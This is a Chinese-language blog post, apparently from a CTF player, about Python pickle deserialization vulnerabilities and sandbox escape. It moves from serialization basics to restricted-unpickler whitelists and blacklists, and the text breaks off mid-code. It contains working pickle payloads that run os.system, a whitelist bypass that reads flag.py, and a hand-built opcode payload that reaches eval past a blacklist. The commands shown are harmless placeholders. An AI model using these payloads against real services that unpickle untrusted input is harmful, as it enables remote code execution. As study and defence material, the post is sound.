<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/favicon.ico?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="打2019Suctf的时候遇到了一个python反序列化漏洞的题目，学习了一波，由于没有接触过并且python水平确实不够，学习的很困难，没有搞出来。tcl.gg 不过学习还是要学习的 序列化与反序列化序列化 当程序运行时，所有的变量或者对象都是存储到内存中的，一旦程序调用完成，这些变量或者对象所占有的内存都会被回收。而为了实现变量和对象持久化的存储到磁盘中或在网络上进行传输，我们需要将变量或者对">
<meta property="og:type" content="article">
<meta property="og:title" content="Python反序列化漏洞以及沙箱逃逸">
<meta property="og:url" content="https://ppcrab.github.io/2019/08/18/Python反序列化漏洞以及沙箱逃逸/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="打2019Suctf的时候遇到了一个python反序列化漏洞的题目，学习了一波，由于没有接触过并且python水平确实不够，学习的很困难，没有搞出来。tcl.gg 不过学习还是要学习的 序列化与反序列化序列化 当程序运行时，所有的变量或者对象都是存储到内存中的，一旦程序调用完成，这些变量或者对象所占有的内存都会被回收。而为了实现变量和对象持久化的存储到磁盘中或在网络上进行传输，我们需要将变量或者对">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://ppcrab.github.io/2019/08/18/Python反序列化漏洞以及沙箱逃逸/1.PNG">
<meta property="og:image" content="https://ppcrab.github.io/2019/08/18/Python反序列化漏洞以及沙箱逃逸/6e3ef780-5535-4a7d-98c4-88edb18faf9f.864e0472fcb8.png">
<meta property="og:updated_time" content="2019-08-20T08:51:25.192Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Python反序列化漏洞以及沙箱逃逸">
<meta name="twitter:description" content="打2019Suctf的时候遇到了一个python反序列化漏洞的题目，学习了一波，由于没有接触过并且python水平确实不够，学习的很困难，没有搞出来。tcl.gg 不过学习还是要学习的 序列化与反序列化序列化 当程序运行时，所有的变量或者对象都是存储到内存中的，一旦程序调用完成，这些变量或者对象所占有的内存都会被回收。而为了实现变量和对象持久化的存储到磁盘中或在网络上进行传输，我们需要将变量或者对">
<meta name="twitter:image" content="https://ppcrab.github.io/2019/08/18/Python反序列化漏洞以及沙箱逃逸/1.PNG">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://ppcrab.github.io/2019/08/18/Python反序列化漏洞以及沙箱逃逸/"/>





  <title>Python反序列化漏洞以及沙箱逃逸 | Hexo</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">



   <a href="https://github.com/you"><img style="position: absolute; top: 0; right: 0; border: 0;"  src="https://ppcrab.github.io/" alt="Fork me on  GitHub"></a>
   






  
  
    
  
   
   <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
   
  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-music">
          <a href="/music" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-music"></i> <br />
            
            喜欢的一些音乐
          </a>
        </li>
      
        
        <li class="menu-item menu-item-book">
          <a href="/book" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />
            
            我读过的一些书籍以及笔记
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://ppcrab.github.io/2019/08/18/Python反序列化漏洞以及沙箱逃逸/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/photo/hello.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Python反序列化漏洞以及沙箱逃逸</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-08-18T22:40:58+08:00">
                2019-08-18
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  2.5k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Reading time &asymp;</span>
                
                <span title="Reading time">
                  10
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>打2019Suctf的时候遇到了一个python反序列化漏洞的题目，学习了一波，由于没有接触过并且python水平确实不够，学习的很困难，没有搞出来。tcl.gg</p>
<p>不过学习还是要学习的</p>
<h3 id="序列化与反序列化"><a href="#序列化与反序列化" class="headerlink" title="序列化与反序列化"></a>序列化与反序列化</h3><h4 id="序列化"><a href="#序列化" class="headerlink" title="序列化"></a>序列化</h4><blockquote>
<p>当程序运行时，所有的变量或者对象都是存储到内存中的，一旦程序调用完成，这些变量或者对象所占有的内存都会被回收。而为了实现变量和对象持久化的存储到磁盘中或在网络上进行传输，我们需要将变量或者对象转化为二进制流的方式。 而将其转化为二进制流的过程就是序列化。</p>
</blockquote>
<p>我在刚看到这段定义的时候，并不是很理解，<strong>为了实现变量和对象持久化的存储到磁盘中或在网络上进行传输</strong>这句话。所以我去找了持久化和序列化的区别：</p>
<blockquote>
<p><a href="http://baike.baidu.com/view/2472114.htm" target="_blank" rel="noopener">持久</a><a href="http://baike.baidu.com/view/270175.htm" target="_blank" rel="noopener">化</a>（Persistence），即把<a href="http://baike.baidu.com/subview/38752/8058696.htm" target="_blank" rel="noopener">数据</a>（如内存中的对象）保存到可永久保存的存储设备中（如磁盘）。持久化的主要应用是将内存中的对象存储在关系型的数据库中，当然也可以存储在磁盘文件中、XML数据文件中等等。</p>
<p>持久化是将程序数据在持久状态和瞬时状态间转换的机制。</p>
<p>持久化是一种对象服务，就是把内存中的对象保存到外存中，让以后能够取回。需要实现至少3个接口：</p>
<p>void Save(object o) 把一个对象保存到外存中</p>
<p>Object Load(object oid) 通过对象标识从外存中取回对象</p>
<p>bool<a href="http://baike.baidu.com/view/1229931.htm" target="_blank" rel="noopener">Exists</a>(object oid) 检查外存中是否存在某个对象</p>
</blockquote>
<p>至于为什么需要持久化，这是由于内存的固有缺陷引起的，因为内存无法永久的储存数据，比如断电，进程退出。立马gg</p>
<blockquote>
<p>序列化也是一种对象服务，就是把内存中的对象序列化成<a href="https://www.zhihu.com/question/38075755" target="_blank" rel="noopener">流</a>、或者把流反序列化成对象。</p>
<p>序列化是为了解决对象的传输问题，传输可以在<a href="http://baike.baidu.com/view/1053.htm" target="_blank" rel="noopener">线程</a>之间、进程之间、内存外存之间、<a href="http://baike.baidu.com/view/23880.htm" target="_blank" rel="noopener">主机</a>之间进行。我之所以在这里提到序列化，是因为我们可以利用序列化来辅助持久化，可以说凡是可以持久化的对象都可以序列化，因为序列化相对容易一些（也不是很容易），所以主流的软件基础设施，比如.net和java，已经把序列化的框架完成了</p>
</blockquote>
<p>好了，最基础的东西明白了，继续</p>
<h4 id="反序列化"><a href="#反序列化" class="headerlink" title="反序列化"></a>反序列化</h4><p>而反序列化就是说程序运行的时候不能从磁盘中进行读取，需要将序列化的对象或者变量从磁盘中转移到内存中，同时也会将二进制流转换为原来的数据格式。我们把这一过程叫做反序列化。</p>
<p>可以看到这里的序列化和反序列化提到了网络传输，所以，如果这种传输方式有漏洞，那么利用这种漏洞就可以作为我们获得远程权限的方式。</p>
<h3 id="python的序列化反序列化模块pickle和json"><a href="#python的序列化反序列化模块pickle和json" class="headerlink" title="python的序列化反序列化模块pickle和json"></a>python的序列化反序列化模块pickle和json</h3><h4 id="pickle"><a href="#pickle" class="headerlink" title="pickle"></a>pickle</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line">dict1 = &#123;<span class="string">'a'</span>: <span class="number">1</span>, <span class="string">'b'</span>: <span class="number">2</span>&#125;</span><br><span class="line"></span><br><span class="line">dict2 = pickle.dumps(dict1)</span><br><span class="line"></span><br><span class="line">print(dict2,type(dict2),id(dict2))</span><br><span class="line"></span><br><span class="line">dict3 = pickle.loads(dict2)</span><br><span class="line"></span><br><span class="line">print(dict3,type(dict3),id(dict3))</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">b&apos;\x80\x03&#125;q\x00(X\x01\x00\x00\x00aq\x01K\x01X\x01\x00\x00\x00bq\x02K\x02u.&apos; &lt;class &apos;bytes&apos;&gt; 1798082169904</span><br><span class="line">&#123;&apos;a&apos;: 1, &apos;b&apos;: 2&#125; &lt;class &apos;dict&apos;&gt; 1798080970112</span><br></pre></td></tr></table></figure>
<p>从这个结果也可以进一步理解序列化与内存的关系，很明显，这两者在内存中的地址变了。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line">dict1 = &#123;<span class="string">'a'</span>: <span class="number">1</span>, <span class="string">'b'</span>: <span class="number">2</span>&#125;</span><br><span class="line">file = open(<span class="string">'1.txt'</span>, <span class="string">'wb'</span>)</span><br><span class="line">dict2 = pickle.dump(dict1, file)</span><br><span class="line">file.close()</span><br><span class="line">print(dict2, type(dict2), id(dict2))</span><br><span class="line">file1 = open(<span class="string">'1.txt'</span>, <span class="string">'rb'</span>)</span><br><span class="line">dict3 = pickle.load(file1)</span><br><span class="line">file1.close()</span><br><span class="line">print(dict3, type(dict3), id(dict3))</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"> None &lt;class &apos;NoneType&apos;&gt; 1665574096</span><br><span class="line">&#123;&apos;a&apos;: 1, &apos;b&apos;: 2&#125; &lt;class &apos;dict&apos;&gt; 2223480349680</span><br></pre></td></tr></table></figure>
<h4 id="json"><a href="#json" class="headerlink" title="json"></a>json</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> json</span><br><span class="line"></span><br><span class="line">dict1 = &#123;<span class="string">'a'</span>: <span class="number">1</span>, <span class="string">'b'</span>: <span class="number">2</span>&#125;</span><br><span class="line">dict2 = json.dumps(dict1)</span><br><span class="line">print(dict2, type(dict2), id(dict2))</span><br><span class="line">dict3 = json.loads(dict2)</span><br><span class="line">print(dict3, type(dict3), id(dict3))</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;a&quot;: 1, &quot;b&quot;: 2&#125; &lt;class &apos;str&apos;&gt; 2165132891960</span><br><span class="line">&#123;&apos;a&apos;: 1, &apos;b&apos;: 2&#125; &lt;class &apos;dict&apos;&gt; 2165130960184</span><br></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> json</span><br><span class="line"></span><br><span class="line">dict1 = &#123;<span class="string">'a'</span>: <span class="number">1</span>, <span class="string">'b'</span>: <span class="number">2</span>&#125;</span><br><span class="line">file1 = open(<span class="string">'1.txt'</span>, <span class="string">'w'</span>)</span><br><span class="line">dict2 = json.dump(dict1, file1)</span><br><span class="line">file1.close()</span><br><span class="line">print(dict2, type(dict2), id(dict2))</span><br><span class="line">file2 = open(<span class="string">'1.txt'</span>, <span class="string">'r'</span>)</span><br><span class="line">dict3 = json.load(file2)</span><br><span class="line">print(dict3, type(dict3), id(dict3))</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">None &lt;class &apos;NoneType&apos;&gt; 1665574096</span><br><span class="line">&#123;&apos;a&apos;: 1, &apos;b&apos;: 2&#125; &lt;class &apos;dict&apos;&gt; 2161938798992</span><br></pre></td></tr></table></figure>
<p>我要先搞一波pickle的漏洞</p>
<h3 id="python反序列化漏洞的原因"><a href="#python反序列化漏洞的原因" class="headerlink" title="python反序列化漏洞的原因"></a>python反序列化漏洞的原因</h3><p>序列化对象的时候，类中的自动执行的函数也会被序列化，并且在反序列化的时候，该函数(<strong> reduce </strong>)会直接被执行。</p>
<blockquote>
<p>When a tuple is returned, it must be between two and five items long. Optional items can either be omitted, or None can be provided as their value. The semantics of each item are in order:<br>A callable object that will be called to create the initial version of the object. A tuple of arguments for the callable object. An empty tuple must be given if the callable does not accept any argument. ……</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">xuliehua</span><span class="params">(object)</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__reduce__</span><span class="params">(self)</span>:</span></span><br><span class="line">        <span class="keyword">return</span> (os.system, (<span class="string">'echo "Hello,world"'</span>,))</span><br><span class="line">d = xuliehua()</span><br><span class="line">de = pickle.dumps(d)</span><br><span class="line">print(de)</span><br><span class="line">pickle.loads(de)</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">b&apos;\x80\x03cnt\nsystem\nq\x00X\x08\x00\x00\x00echo &quot;H&quot;q\x01\x85q\x02Rq\x03.&apos;</span><br><span class="line">&quot;Hello,world&quot;</span><br></pre></td></tr></table></figure>
<p>也就是说，如果直接采用pickle.loads()去反序列化。结果是我们不能承受的，因为这里的命令我们可以随便填写的，相当于我们控制了对面的服务器，可还行？</p>
<h4 id="保护-限制"><a href="#保护-限制" class="headerlink" title="保护-限制"></a>保护-限制</h4><h5 id="example1"><a href="#example1" class="headerlink" title="example1"></a>example1</h5><p><a href="https://docs.python.org/3.7/library/pickle.html#pickle-restrict" target="_blank" rel="noopener">官方文档</a>给出了优化的例子</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> builtins</span><br><span class="line"><span class="keyword">import</span> io</span><br><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"></span><br><span class="line">safe_builtins = &#123;</span><br><span class="line">    <span class="string">'range'</span>,</span><br><span class="line">    <span class="string">'complex'</span>,</span><br><span class="line">    <span class="string">'set'</span>,</span><br><span class="line">    <span class="string">'frozenset'</span>,</span><br><span class="line">    <span class="string">'slice'</span>,</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">RestrictedUnpickler</span><span class="params">(pickle.Unpickler)</span>:</span></span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">find_class</span><span class="params">(self, module, name)</span>:</span></span><br><span class="line">        <span class="comment"># Only allow safe classes from builtins.</span></span><br><span class="line">        <span class="keyword">if</span> module == <span class="string">"builtins"</span> <span class="keyword">and</span> name <span class="keyword">in</span> safe_builtins:</span><br><span class="line">            <span class="keyword">return</span> getattr(builtins, name)</span><br><span class="line">        <span class="comment"># Forbid everything else.</span></span><br><span class="line">        <span class="keyword">raise</span> pickle.UnpicklingError(<span class="string">"global '%s.%s' is forbidden"</span> %</span><br><span class="line">                                     (module, name))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">restricted_loads</span><span class="params">(s)</span>:</span></span><br><span class="line">    <span class="string">"""Helper function analogous to pickle.loads()."""</span></span><br><span class="line">    <span class="keyword">return</span> RestrictedUnpickler(io.BytesIO(s)).load()</span><br></pre></td></tr></table></figure>
<p>可以很清楚的看到，使用了中间类RestrictedUnpickler来反序列化，并加入白名单。只允许我们允许的类以及方法，这就有点东西了。</p>
<p>比如我们仍然将我们想要进行攻击的数据写成这样</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">xuliehua</span><span class="params">(object)</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__reduce__</span><span class="params">(self)</span>:</span></span><br><span class="line">        <span class="keyword">return</span> (os.system, (<span class="string">'echo "Hello,world"'</span>,))</span><br><span class="line">d = xuliehua()</span><br><span class="line">de = pickle.dumps(d)</span><br><span class="line">restricted_loads(de)</span><br></pre></td></tr></table></figure>
<p>得到的是：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_pickle.UnpicklingError: global &apos;nt.system&apos; is forbidden</span><br></pre></td></tr></table></figure>
<p>也就是说我们成功的将条件限制在了<em>module == “builtins” and name in safe_builtins</em> </p>
<h5 id="example2"><a href="#example2" class="headerlink" title="example2"></a>example2</h5><p>然而，有一些限制有时候并不能阻止我们的攻击，比如hackergame2017的Hide and Seek题目中</p>
<p>限制条件为</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> module == <span class="string">"usingclass"</span> <span class="keyword">and</span> name == <span class="string">'file_contents'</span>:</span><br><span class="line">      <span class="keyword">return</span> file_contents</span><br><span class="line"><span class="keyword">raise</span> pickle.UnpicklingError(<span class="string">"module='%s', name='%s' 是非法的"</span> % (module, name))</span><br></pre></td></tr></table></figure>
<p>我们可以看到，限制了我们的类名必须是usingclass，方法必须是file_contents</p>
<p>实际上，限制条件往往需要我们去试验，这种限制条件正常情况下怎么可能直接告诉你</p>
<p>so，此时我们只需要满足这个条件就可以了，十分简单</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">file_contents</span><span class="params">( filename , mode = <span class="string">'r'</span>)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">"a"</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Credentials</span><span class="params">(object)</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__reduce__</span><span class="params">(self)</span>:</span></span><br><span class="line">        <span class="keyword">return</span> (file_contents,(<span class="string">'flag.py'</span>,))</span><br><span class="line">apple = pickle.dumps(Credentials())</span><br><span class="line">print(apple)</span><br><span class="line">apple = apple.replace(<span class="string">b'__main__'</span>,<span class="string">b'usingname'</span>) </span><br><span class="line">orange = safe_unpickle(apple)</span><br><span class="line">print(orange)</span><br></pre></td></tr></table></figure>
<p>实际上，我们只是猜测了服务器端原有的usingclass模块含有的file_contents()函数的功能是读取文件内容。</p>
<p>而实际传输的序列化数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">b&apos;\x80\x03cusingclass\nfile_contents\nq\x00X\x07\x00\x00\x00flag.pyq\x01\x85q\x02Rq\x03.&apos;</span><br></pre></td></tr></table></figure>
<p>仅仅是帮助满足了限制条件，顺便填充了栈，进而在return时调用file_content.(ps)</p>
<p> <img src="/2019/08/18/Python反序列化漏洞以及沙箱逃逸/1.PNG" alt="1"></p>
<p>所以说，这里并不是usingclass在调用file_contents模块，而是恰好语句构成的栈环境与下面的语句联系起来了。</p>
<p>当然，我们可以对我们的safeupickle进行一点改进</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> module == <span class="string">"usingclass"</span> <span class="keyword">and</span> name == <span class="string">'file_contents'</span>:</span><br><span class="line">       <span class="keyword">return</span> getattr(sys.modules[module], name)</span><br></pre></td></tr></table></figure>
<p>这就成了调用了~，nice</p>
<h5 id="example3"><a href="#example3" class="headerlink" title="example3"></a>example3</h5><p>关键的语句如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">blacklist = &#123;<span class="string">'eval'</span>, <span class="string">'exec'</span>, <span class="string">'execfile'</span>, <span class="string">'compile'</span>, <span class="string">'open'</span>, <span class="string">'input'</span>, <span class="string">'__import__'</span>, <span class="string">'exit'</span>&#125;</span><br><span class="line"><span class="string">"......................................"</span></span><br><span class="line"><span class="keyword">if</span> module == <span class="string">"builtins"</span> <span class="keyword">and</span> name <span class="keyword">not</span> <span class="keyword">in</span> blacklist:</span><br><span class="line">         <span class="keyword">return</span> getattr(builtins, name)</span><br></pre></td></tr></table></figure>
<p>我试图通过map绕过这个限制,重新调用exec()</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">xuliehua</span><span class="params">(object)</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__reduce__</span><span class="params">(self)</span>:</span></span><br><span class="line">        <span class="keyword">return</span> (map,((builtins.<span class="keyword">exec</span>[<span class="string">"__import__('os').system('dir')"</span>])))</span><br></pre></td></tr></table></figure>
<p>结果确实报错</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_pickle.UnpicklingError: global &apos;builtins.exec&apos; is forbidden</span><br></pre></td></tr></table></figure>
<p>并且我通过</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> module == <span class="string">"builtins"</span> <span class="keyword">and</span> name <span class="keyword">not</span> <span class="keyword">in</span> blacklist:</span><br><span class="line">      print(<span class="string">"right"</span>)</span><br><span class="line">      <span class="keyword">return</span> getattr(builtins, name)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line">      print(<span class="string">"Error"</span>)</span><br></pre></td></tr></table></figure>
<p>的结果显示，明白了，反序列化的过程中，似乎这个检查没那么简单，并不是只检查一个外层模块就完事了。有点迷，看来需要学习新的知识了</p>
<h6 id="手搓payload-amp-pickle语言的学习"><a href="#手搓payload-amp-pickle语言的学习" class="headerlink" title="手搓payload &amp;pickle语言的学习"></a>手搓payload &amp;pickle语言的学习</h6><p><a href="https://www.leavesongs.com/PENETRATION/code-breaking-2018-python-sandbox.html#pickle-code" target="_blank" rel="noopener">https://www.leavesongs.com/PENETRATION/code-breaking-2018-python-sandbox.html#pickle-code</a></p>
<p> <img src="/2019/08/18/Python反序列化漏洞以及沙箱逃逸/6e3ef780-5535-4a7d-98c4-88edb18faf9f.864e0472fcb8.png" alt="6e3ef780-5535-4a7d-98c4-88edb18faf9f.864e0472fcb8"></p>
<p>以这个题目中给出的payload例子</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">de = <span class="string">b'''cbuiltins</span></span><br><span class="line"><span class="string">getattr</span></span><br><span class="line"><span class="string">(cbuiltins</span></span><br><span class="line"><span class="string">dict</span></span><br><span class="line"><span class="string">S'get'</span></span><br><span class="line"><span class="string">tR(cbuiltins</span></span><br><span class="line"><span class="string">globals</span></span><br><span class="line"><span class="string">(tRS'builtins'</span></span><br><span class="line"><span class="string">tRp1</span></span><br><span class="line"><span class="string">cbuiltins</span></span><br><span class="line"><span class="string">getattr</span></span><br><span class="line"><span class="string">(g1</span></span><br><span class="line"><span class="string">S'eval'</span></span><br><span class="line"><span class="string">tR(S'__import__("os").system("dir")'</span></span><br><span class="line"><span class="string">tR.'''</span></span><br><span class="line">print(de)</span><br><span class="line">restricted_loads(de)</span><br><span class="line"><span class="string">"我们稍加修改一下find_class函数中的一些语句"</span></span><br><span class="line"><span class="string">"......."</span></span><br><span class="line"> <span class="keyword">if</span> module == <span 